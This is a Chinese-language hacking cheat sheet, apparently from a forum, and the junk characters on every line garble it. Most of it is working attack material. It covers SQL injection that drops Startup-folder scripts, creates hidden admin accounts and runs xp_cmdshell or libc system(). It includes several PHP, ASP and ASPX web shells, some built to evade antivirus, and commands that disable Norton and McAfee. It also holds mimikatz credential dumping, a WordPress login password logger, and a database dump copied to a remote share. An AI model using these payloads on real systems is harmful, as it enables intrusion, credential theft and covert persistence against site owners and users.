{6 D; k9 E9 tinsert into a values ("set wshshell=createobject (""wscript.shell"") " );& ]7 h9 @, x( e% U4 x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
/ b7 l$ Q/ ]$ f8 s& O! d! m6 pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
) j1 k- ~: c. o4 S k& }( Jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";9 H3 I, r+ d$ i. b
drop table a;
6 t% {6 `7 }. ]$ r: Z+ J
5 k- ]+ F* c. w( o) V. y英文版本:! E+ [7 f% Q. Z7 g
7 ` n& O4 ]/ g+ D; v6 p4 h( M" wuse test;
$ @+ B7 V+ k- `3 q. gcreate table a (cmd text);
: `1 X) K/ H5 Einsert into a values ("set wshshell=createobject (""wscript.shell"") " );
, y! W: h* N2 x; N( U; xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
2 y. }6 J" f+ y1 W) I) r9 |insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. Q) a7 a- k' l) k
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
' M7 B5 Q% ~" Bdrop table a;
5 ~: H) D {* ?( Y) S, y( U( g; \ V" h# j" z, @& B5 o. E- X
create table a (cmd BLOB);
6 D' S7 r& P5 m- Y; Cinsert into a values (CONVERT(木马的16进制代码,CHAR));; F' O5 ?) n8 L' M6 ?" r) u- r
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
) ]# ~7 D1 d9 `$ b! B4 A/ @drop table a;& [* W6 v: R7 z0 H) e9 j- _7 t6 t
( S, m( e: g4 R+ Q" f7 t记录一下怎么处理变态诺顿
# Y2 F7 o, n/ C# I( W: `0 Z查看诺顿服务的路径8 P& R7 Q8 c5 b0 I( K, s5 n$ v
sc qc ccSetMgr! c4 C* p4 j w. S% p3 i& w
然后设置权限拒绝访问。做绝一点。。& o) \4 q3 ~ x) l/ u5 E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
s- \ r- C9 I# f* rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER" i; R' Y/ }/ i
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' e( C( K0 f9 E: q1 J9 A" V8 zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
6 O& j, n" _3 y' \ `5 E# V( E+ u( B
然后再重启服务器8 o+ _' i0 d6 q2 l2 H( V+ k
iisreset /reboot
0 c \+ H' P+ ]/ Q5 }这样就搞定了。。不过完事后。记得恢复权限。。。。
$ w- G. L0 C, \3 c8 U0 D! C/ T: qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
5 N+ a! D, n3 n( hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, T! e" Y0 h$ {+ w, p8 g3 s u
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F0 [ }' b' b) @& K. j% \ g
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F, _% ?6 r; E6 \
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
' p0 P; L; V! l: {" f: y1 F9 T
& F0 E+ f' _( @' U' _' EEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
6 X; F8 u9 `5 j3 S2 f, A; {1 H" }0 ^7 c, b$ h
postgresql注射的一些东西$ m9 z0 | ^ X9 H6 b4 T$ c: e
如何获得webshell4 P/ M: _' |5 e5 u- m
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
. F2 z, K) j8 j0 B+ W7 Jhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
0 S2 V' b$ |; g, X, e4 a8 Rhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
" e# y+ E o) ^$ m如何读文件; m* \5 E: j- L; O8 w: @8 J
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
( `- G. t) r. U. G, Z$ b. m6 V, Jhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
: [/ E* X: P: z" zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
4 V/ r' n8 E+ P3 G2 {2 W% _& n3 @& |7 u: f0 ?8 e
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。, M6 r, \- F8 I" u4 P7 M3 b2 R( ~
当然,这些的postgresql的数据库版本必须大于8.X( R" `7 P- D+ m7 U' |- S1 d
创建一个system的函数:
8 L. @2 f3 `% S# d( t0 \CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
$ Q+ E1 | Z( C
) h. ]9 u% J7 [创建一个输出表:
1 H' j" P1 |3 ~9 W8 E# FCREATE TABLE stdout(id serial, system_out text)2 @7 T! m8 Y5 H) m1 }8 I
( Z8 q* r7 K, g% K执行shell,输出到输出表内:; Z: i# l- @& L2 o( g
SELECT system('uname -a > /tmp/test')
. t3 B) W; u6 Q- m y p2 W5 b2 l% U/ L% e' P
copy 输出的内容到表里面;
3 B9 O* O* H9 q( |5 V+ a5 pCOPY stdout(system_out) FROM '/tmp/test'2 }$ A- V I+ z. I( h
" C. x, C' w$ @: \! }
从输出表内读取执行后的回显,判断是否执行成功
4 k/ \, P' P5 m. c3 m2 e- V0 K: r: r# E
SELECT system_out FROM stdout
6 x3 F I$ M( U% G# S1 Y5 d3 x! c下面是测试例子
3 ]) G" ^9 P) L4 b; b, B
1 A' w" \5 A/ v1 I1 L* L( u/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- : q2 x4 [; M& u2 e/ r: G
, j# e5 [0 a3 u! b* D( L4 `2 }! T
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'6 K# O6 N* e! c+ u Z- l
STRICT --
3 n5 O4 f5 R% J6 Y
" @9 \8 }6 `& P4 r. X/ U/store.php?id=1; SELECT system('uname -a > /tmp/test') --
, K! c& y: z$ h8 j
' B! A6 x6 z2 `1 p' `/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
0 G2 H4 `. `2 z/ Q5 m6 A
2 M' j( t- z( `1 w1 H/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
9 ]% W) o; Q }, M @9 tnet stop sharedaccess stop the default firewall* l# U$ n# F j4 c1 w# V" p3 c# ^! L
netsh firewall show show/config default firewall
' X! U) }5 P: C; m/ j& G( xnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
. X! J8 z) [' Z# jnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall9 r' q# u5 Y: q! u* y! Y: ~
修改3389端口方法(修改后不易被扫出)
7 \3 B* g- f( S5 B3 Y4 X5 a4 E% k( x修改服务器端的端口设置,注册表有2个地方需要修改
Z# m2 t6 q. c
& X8 P; K- E' d$ q[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]5 b% {) t7 e) \ I
PortNumber值,默认是3389,修改成所希望的端口,比如6000
- o! u! X- ?! e* \2 s. I6 ~4 p: ~1 w3 \& {$ F
第二个地方:
. A! p/ L/ w$ H[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 5 p0 [# J1 R( e P' \
PortNumber值,默认是3389,修改成所希望的端口,比如6000
. S7 v3 o% f! F+ y! t/ j
) b7 F7 }" m/ s, t- y6 ~3 n3 B现在这样就可以了。重启系统就可以了
. s3 @/ g8 F% i% }; Z J
3 H+ R. `3 ?2 T查看3389远程登录的脚本
, h" O7 Y4 M* [8 G保存为一个bat文件$ `6 x; o: q( c0 R' F) z
date /t >>D:\sec\TSlog\ts.log' h0 k+ b( U7 s: u6 q" m
time /t >>D:\sec\TSlog\ts.log
2 u" d5 a* g8 p4 V- U$ Knetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log8 s5 L% f0 s9 Q0 n/ z/ @3 d
start Explorer+ G* r0 h2 ^0 M8 [
) m! }2 J& Z! b8 emstsc的参数:
: a4 `6 S! I, h% {; O9 a! |( R/ l) k- U
远程桌面连接# C( y! [ F1 r+ b
* x& f1 r7 [: L" z* ~$ `
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
' j) h1 h: R. j [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?3 v; @, L ~- H8 b6 ?9 ]
3 O( b- }7 H# B
<Connection File> -- 指定连接的 .rdp 文件的名称。0 g% {8 x O* C% K, M2 I5 t
: _0 R/ p- r7 x8 U2 H
/v:<server[:port]> -- 指定要连接到的终端服务器。6 E8 Z( A6 A' p; D8 M
: r+ f4 B5 A# T U5 t2 A/console -- 连接到服务器的控制台会话。
5 X. I. _. p2 z
6 ~ W0 q3 ?& W/ W u/f -- 以全屏模式启动客户端。
7 s0 m7 W% \+ G& Y( h
$ X9 N; X3 X) _2 G; j/w:<width> -- 指定远程桌面屏幕的宽度。
' [4 i9 L' |& M8 a" K7 |0 p. j) k- {
/h:<height> -- 指定远程桌面屏幕的高度。
9 U( }( W( V( M1 r2 n# S) O
! f4 Z7 _7 \ W; @0 Y/edit -- 打开指定的 .rdp 文件来编辑。; C4 k7 J' @, A6 ^5 ?7 R d9 D
\8 X5 W* \; J1 v# V7 r
/migrate -- 将客户端连接管理器创建的旧版" v, }$ o0 B8 _6 I( d/ p
连接文件迁移到新的 .rdp 连接文件。5 X% ~9 V& ?: m! ~2 V+ k# }
3 m6 W1 N$ z+ W8 j9 W, F' w
( \ H, w, {. t& _其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
4 t) l1 d' c& B9 jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量8 e9 T) A- c9 X5 p1 A) h
' x) w3 j+ L g' A q7 d1 I0 K1 J命令行下开启3389
. ]$ f: P& ~! Q4 z" Snet user asp.net aspnet /add1 @0 [, [& d5 D8 e7 E9 u! u% A
net localgroup Administrators asp.net /add
3 L* ]/ b) _; |+ K; znet localgroup "Remote Desktop Users" asp.net /add6 X5 ?& Q9 m* h+ n f8 {4 Z+ k
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D& Z$ [, z: J8 x! O2 L9 @2 z; q
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0# H3 h' F3 L* n9 O- `: P
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
- E+ C8 n- h/ [8 G5 R' Mecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f1 `+ i: u* l1 B
sc config rasman start= auto
3 h, b" C5 B/ ?4 `' m; Nsc config remoteaccess start= auto d! N+ C* j/ t q' |" y6 r
net start rasman
) D: R/ P6 j6 P5 m% u" J5 q. gnet start remoteaccess
3 ]" K& p, f+ O; d8 B% }Media" v8 k& \* h1 f" j. C6 V: O n
<form id="frmUpload" enctype="multipart/form-data"
7 v4 _4 G+ \/ \; h5 n1 v' Taction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>( v% S; _0 H* v+ ? w _) j
<input type="file" name="NewFile" size="50"><br>$ e z! a: p4 V
<input id="btnUpload" type="submit" value="Upload">3 S; x8 k* v% A$ J- s! v
</form>$ e+ F0 e# H& @( ]8 E
; k0 b5 p, c0 ?" K4 W6 C
control userpasswords2 查看用户的密码
* l. r& m! c* uaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径2 }$ b$ q0 U; T B2 v5 X+ d( ?
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
/ T9 J2 q' }4 b( O5 r1 `
+ w& z" j" W9 e" X1 W1 g141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
# d2 l2 R3 Q4 f; j/ g测试1:
) U2 Y" U7 O0 M' R6 R: _6 vSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! v% {! B6 c) c% e1 t, ~) g
% m3 E) w# ~: `& G
测试2:$ e7 F9 B4 z" P8 ?9 D
* k& M0 S: R$ f6 r" Z0 Screate table dirs(paths varchar(100),paths1 varchar(100), id int)
- l* y8 j: C8 N, N k0 y L
' d. F9 M% C' T5 odelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--0 S$ v- O8 w, ?0 l; M
2 g& P. |# R/ t6 O: B
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t15 C, p8 `2 n. K- @/ j
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令! a7 L1 o# ^4 z# O/ ]; }5 O
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;1 J7 J2 Y& Z+ d; t( w U
net stop mcafeeframework1 c, p- K! f- s' C% d- H, h1 A
net stop mcshield0 z% U" `2 y2 e6 U& k- _" H- ~& D
net stop mcafeeengineservice- ]3 l, [7 R7 X9 J3 ?) s* x1 ]
net stop mctaskmanager7 R' [, W9 q! W
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
; L) B6 g+ U& A; o) `8 V J H; H- ] \" H+ K/ x/ K* d- d* U a7 R
VNCDump.zip (4.76 KB, 下载次数: 1) : W# N' ]; ^1 q
密码在线破解http://tools88.com/safe/vnc.php* G" j& d( c; _
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
2 {3 d% ^$ ^* ]
# {2 I' G/ U0 Sexec master..xp_cmdshell 'net user'
3 F9 p6 k1 g5 M# Zmssql执行命令。
6 B4 \" r4 f k2 ^' z获取mssql的密码hash查询
. [ M, A3 A3 _ n; _select name,password from master.dbo.sysxlogins
9 f9 E9 R( y3 R. z% N0 V) d" D; M$ m/ s7 n7 e
backup log dbName with NO_LOG;8 {$ q- y- l/ Y& K9 y3 U3 z' I
backup log dbName with TRUNCATE_ONLY;! J( o0 e8 q% }3 n# D
DBCC SHRINKDATABASE(dbName);
+ f6 D0 c- I( i7 E' `7 O. a% j" @mssql数据库压缩, K* ?- u/ D. L8 A" R$ }" A& c
7 N/ d& E$ p1 d" ~2 X& X. H
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK, t& I! V4 w% ~7 Z
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
" F; J3 A9 R; W v5 m" h1 c! ^2 K* |3 l, I' y# @
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ j$ v2 M8 z6 T A0 u6 ?备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak% z5 G/ y0 Y* q/ ~7 W9 p4 @
% b; u& P9 H* b+ g* b; l7 k
Discuz!nt35渗透要点:9 v( E5 ?" ~ O; R6 ]. \
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default. g7 H- F) q$ ?7 p# q
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>! \% L6 |+ V# S+ k! R
(3)保存。; X/ j4 }3 ?! C' S7 J: R$ M
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass+ U8 y& F- }) N% A4 ~$ W2 H4 m
d:\rar.exe a -r d:\1.rar d:\website\
7 ]% c* K6 S) C! Y1 V( u递归压缩website/ Y* ]3 \, p' O+ T
注意rar.exe的路径
' ?& b) q: i. l5 f- y
; q7 e8 a8 S, E<?php
# t# H/ t6 C; C( A4 x$ P9 Q/ Q
$telok = "0${@eval($_POST[xxoo])}";3 R0 ^8 Q) z! T, i
: K; Z+ f8 `. ^9 D* b$ m' e+ L
$username = "123456";' Y% @# i! s8 x6 ?; ]9 ^3 A/ v
3 W% S" V& x2 q; w, Y5 A
$userpwd = "123456";
) h3 F0 ?; u) _& i. W! d, {0 Y8 R4 F; u+ Q: n" |& [. c
$telhao = "123456";
1 i" d4 ?) N7 j+ d* @* w6 R+ e2 X& A/ |" f! c
$telinfo = "123456";* V1 S/ e: P) b Y5 E) ~
1 b9 l( V& J, ?4 X* z; Z& ?1 f
?>9 E" d. k) o- J( F5 @. }- S, p) S
php一句话未过滤插入一句话木马
# W/ M, }0 l7 c5 K, ], U/ C. g3 f8 D* O& D+ m2 Q3 j
站库分离脱裤技巧9 `7 z! W' W4 h2 c% n5 O
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
) |. R, A0 z. hexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'; i. y5 o5 c2 Z& I
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
8 e0 K2 r4 e1 }% B% J这儿利用的是马儿的专家模式(自己写代码)。
* l) X% D' l3 C0 Q9 E5 Cini_set('display_errors', 1);
9 U" T; T5 F) h0 ?7 z9 u7 {# Rset_time_limit(0);# G K1 F+ q+ O- r! [
error_reporting(E_ALL);
: A, s5 d1 s5 B/ E \+ x7 ]$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
+ C) c. r" o4 X0 hmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
) y8 q' i& W- C% _7 e; n5 l8 z$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
0 K6 U. A; Y9 H6 {! j( B$i = 0;
1 E" Z$ D6 W/ S. A8 C4 S/ b, y$tmp = '';8 t7 i& r W! e+ ?) M) r5 g* m
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
1 [& E. |) k8 h $i = $i+1;
* _7 E$ V$ z9 g5 V' O& [; R $tmp .= implode("::", $row)."\n";4 _; b0 o C: r8 i2 I& J9 z
if(!($i%500)){//500条写入一个文件6 ^' T# l: e$ f* k1 p7 w
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';2 J G! T. D+ ^. `4 M% B7 z2 y
file_put_contents($filename,$tmp);
2 J0 v& }8 M* u4 t3 H+ S+ J! z $tmp = '';
3 q9 O# F& y$ | P# S! _; ^( d% ` }, |; z. \7 \- ?: e' O
}
& T5 `) s4 Z5 ]mysql_free_result($result);
: r3 a& x& f' I2 T$ \/ ~2 z3 j0 A2 D; K, n% a. g4 _4 M- f% e
# g6 _7 r- M. F7 h* k
+ a3 M8 b; V# }7 }1 l//down完后delete7 g/ ~ x/ ` V" f* t
0 M/ s- n! v3 A' b0 J
) j/ g( j. o3 i6 S- z& T
ini_set('display_errors', 1);
3 V$ n0 O7 ~) n. s0 lerror_reporting(E_ALL);$ S) H6 c& B1 j" }
$i = 0;
9 v; O* ]% E8 X6 E' \, N# ^/ Nwhile($i<32) {
+ s3 ~' f: m6 |) N* D $i = $i+1;: A7 D% B; z% u! V3 i9 R0 k9 I
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';# H. }3 O# N& B7 ^% N
unlink($filename);
5 j* j! J+ r6 H; e}
, S. g8 _ i# m3 G$ Z& a+ jhttprint 收集操作系统指纹8 q/ j- S; r g3 ?6 H8 b7 f) l1 y! F
扫描192.168.1.100的所有端口
' s/ Y1 A1 h7 u5 N) z5 Qnmap –PN –sT –sV –p0-65535 192.168.1.100
8 T; v2 Y" j4 S$ Vhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
+ q. {8 i1 K; Q, {+ W9 Shost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输+ q( o U# A) ?3 u2 p
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host$ T1 Q- H7 U- j: _
+ i5 y, c8 F5 |9 R
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
% C, I4 E9 {# c: F7 T% s- y' H2 ]7 g2 F! [; i2 X9 h) E- B& x
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
- A4 v: X! x% P. ~! |: t% d
3 g, j( t' s; `: @& k1 e Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x0 f- _1 v# `8 E. K0 ~2 E
3 o+ `0 k o W4 h DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
( _, e, d" n8 B
1 [, _- P1 G2 z+ M# g7 L0 G# [4 J5 D http://net-square.com/msnpawn/index.shtml (要求安装)6 L5 _6 G: H% J L
$ `& ^5 c1 f6 J* C. w tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)8 u$ o9 M" A' g4 t; M
) b3 K% o* a$ r& ^7 J; Y
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
/ B' R/ E3 h3 y& m yset names gb2312( {' M, w3 Z5 `3 V# m, }# w
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。 }. h( W O* `3 c: L: T
5 p% U% F2 N1 c* F* g% i
mysql 密码修改& v! Z3 C% `. g" E
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 0 |: M1 t! j+ e! H
update user set password=PASSWORD('antian365.com') where user='root';
" B. A4 a& {- Y* e; M) C; Uflush privileges;; i4 x& ?) q8 z" M
高级的PHP一句话木马后门
8 p( ?/ J3 n! h( v! H- o
' o1 J8 U: q9 }4 A* u' C入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀) p& n0 |# b4 @. \4 O2 D
! @5 I @" d4 u1、" {. U* i% n& \. h; X; g H4 |4 W
0 H+ |; ~/ Q) Y2 W
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 ~& v) o& _6 g& w% M; e
2 V% M4 U9 Y! X! Y) i
$hh("/[discuz]/e",$_POST['h'],"Access");
. f7 w9 }" `4 k' V' w1 H0 O! ^: p3 Y7 c' j8 Z( ~$ D% }
//菜刀一句话1 N8 j) q( ^" ]
0 Y. B! c) l" _- b) F6 o$ n2、
9 J, \3 ?" ~- c/ d: s/ ?% |6 V, Y, c* |
4 Z* ?$ W; n- A( t$filename=$_GET['xbid'];
2 X2 r& p, C# l; H' I2 E' A6 X8 A1 x& t
include ($filename);" U0 p- }; H2 N$ P8 D, x
8 {$ \2 O, X. w5 O* W s, G: i o//危险的include函数,直接编译任何文件为php格式运行1 X* `4 l' e. p! F3 a3 I/ T0 c
1 ~) C G% A h# e' X7 Q
3、( o( r5 {0 r' r. q+ N" `0 a# M
1 i' Y' M7 d# c" f" l% A$reg="c"."o"."p"."y";3 r4 ~2 i: e* V8 U
7 N/ U- A) {: r5 ~ u; N
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);) i* h+ ]# @, Q& Q- ]3 x* f+ g" a
" e D: O) _6 m! t W& f. z9 i//重命名任何文件% x5 { M9 ?* C' C& S
1 d3 o0 p- E4 X% ~. c3 A+ G% P4、- h6 a; ] k2 A0 K! N
% y1 K/ p4 {* ]+ v9 b6 I6 K$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
( p5 s/ A6 [- _" p3 Y* X! R. \- V: p! {, I) i! {
$gzid("/[discuz]/e",$_POST['h'],"Access");) U. |, i& u4 }& u1 x; V! b }
2 Y- X) n3 N2 j, R, f$ z7 h//菜刀一句话* `7 d! o, ^& a$ u u
6 n, u. h6 q& o& P3 r! V9 n5、include ($uid);
8 p$ o; n" s6 T' L* Z3 p% f# O: {, B j! E/ R2 _) f
//危险的include函数,直接编译任何文件为php格式运行,POST
- y! e( Z" C6 A2 C- l. \& q' {! Z$ a8 q$ e
: _5 }9 x& H( _! J//gif插一句话
7 S4 C4 t* n" x; M& v( y( b* {
0 q8 [" A3 l0 g0 g; O" T5 Y6、典型一句话
1 ?3 E/ g7 {3 L3 V# y( k3 V5 d' _- ~, i" u$ s' @% W
程序后门代码
( D5 i% U' H) r' Z- A<?php eval_r($_POST[sb])?>1 V8 i3 ~4 `! f
程序代码
7 ]2 M+ {0 `8 s3 x<?php @eval_r($_POST[sb])?>
, A5 D w$ q1 ]2 V$ A/ {; h" Z9 F4 W//容错代码, K2 P" V& u! w
程序代码* z$ X: E; V0 j9 m% a( a. ?! _* K
<?php assert($_POST[sb]);?># |9 ]0 ]5 Y+ b9 Y& @' j
//使用lanker一句话客户端的专家模式执行相关的php语句, u+ ~" f* d" s4 E1 J0 m
程序代码
/ F# _8 L" G5 K4 f8 V$ K<?$_POST['sa']($_POST['sb']);?>) z3 Z! a5 s5 X) W, K$ D
程序代码) F. T9 I& ?7 c8 E6 Y& p: b" N# z
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>; S3 J% J# [, q
程序代码
3 g9 ^+ m# ^; w7 p: k2 K! D<?php
' R% J2 {5 s8 F, f@preg_replace("/[email]/e",$_POST['h'],"error");, G* Q" r% J0 v/ U$ [4 }
?>$ M1 B( v2 U0 T( M
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; P- x; M$ q) D8 E+ n程序代码" f2 O" W* l" U# }- C7 G
<O>h=@eval_r($_POST[c]);</O>
3 A7 f( N) m+ T程序代码
9 c& ]1 Z* j5 H4 ~* Z$ O8 i<script language="php">@eval_r($_POST[sb])</script>: U! S& W* L6 n) k% i
//绕过<?限制的一句话 f) k5 Q. ` v1 z
) o8 O& R1 Z3 O* a7 K/ K
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip6 E( D) r; G. z- W
详细用法:
9 s: g! Q, t+ O" z+ V1、到tools目录。psexec \\127.0.0.1 cmd
0 I' r! @9 s- b* d" u" i; I2、执行mimikatz
/ Y' P' y( }7 |* L/ \3 L M8 h3、执行 privilege::debug, i; \' k a1 ?, \2 ?, W4 o+ ~
4、执行 inject::process lsass.exe sekurlsa.dll( n0 R) g E& i5 m2 A5 d. Z7 m
5、执行@getLogonPasswords
, \ J H7 J" u1 j6、widget就是密码. S ], f8 k; H1 K6 W
7、exit退出,不要直接关闭否则系统会崩溃。; k! j8 K" T+ N) c. p6 h& |& F0 P
" _# [) ~$ H s
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
7 h# k* z4 H( L$ ]1 { _) E! D- H9 o! n0 D. J: s' H U0 z X! k
自动查找系统高危补丁; }4 i8 B% Y U; e% b- k
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
9 Z/ ?; H$ y& c" p9 W; I# E4 R% Y8 O, K l: L
突破安全狗的一句话aspx后门
% F; X" X7 o t0 t: o4 J) y$ h<%@ Page Language="C#" ValidateRequest="false" %>3 ^# g3 B' R! J$ V3 ^( H7 A; b& d
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: N9 o, d0 r4 q
webshell下记录WordPress登陆密码
( d/ m" J$ y7 E7 ? Zwebshell下记录Wordpress登陆密码方便进一步社工
3 l; h' j' i2 l3 ]在文件wp-login.php中539行处添加:' e e: f, U R, \! a/ K
// log password
( ^) F! V+ a. n; C# G$log_user=$_POST['log'];2 o' `$ a2 d, X" V: b2 [
$log_pwd=$_POST['pwd'];3 e F" ]8 Z; ?# O* N& d- a
$log_ip=$_SERVER["REMOTE_ADDR"];
# E% h, e5 N2 D; g2 o" O" H8 w$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;% v: |1 m! _/ n% x! E5 \- `
$txt=$txt.”\r\n”;4 ] H! E. u7 t& `" o6 \4 b* |
if($log_user&&$log_pwd&&$log_ip){1 P) f! r7 Q$ _- }
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
3 `/ b& M, l$ |% R* v9 e J}+ U7 E% z6 g. D, T4 n+ L2 \
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。3 T# `: Z& q/ h
就是搜索case ‘login’5 U" c9 Y( j$ p3 |& Z' p. y( [
在它下面直接插入即可,记录的密码生成在pwd.txt中,
1 b9 W1 V! w# v. u- O! Q; p其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
. z0 B# F5 V& l4 r# }利用II6文件解析漏洞绕过安全狗代码:; V* S5 u' g" G/ @$ [
;antian365.asp;antian365.jpg! C# b0 I' L$ Y; k7 ~( f
